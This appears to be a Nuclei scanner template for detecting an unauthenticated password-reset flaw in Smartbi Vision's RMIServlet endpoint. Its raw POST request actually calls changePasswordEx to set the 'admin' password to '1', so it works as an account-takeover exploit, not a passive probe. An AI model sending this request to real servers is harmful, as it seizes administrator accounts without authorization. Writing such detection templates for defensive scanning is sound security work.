http:
    - matchers:
        - status:
            - 200
          type: status
        - condition: and
          type: word
          words:
            - retCode":0
            - duration":13
      matchers-condition: and
      raw:
        - |
          POST /smartbi/vision/RMIServlet HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

          className=UserService&methodName=changePasswordEx&params=["admin","","1"]
id: smartbi-changepasswordex-reset-passwd
info:
    author: ProjectDiscoveryAI
    description: |
        Detects the Smartbi Vision RMIServlet endpoint allowing password changes via unauthenticated requests.
    name: Smartbi - Reset Password
    severity: high
    tags:
        - authenticate
        - Servlet
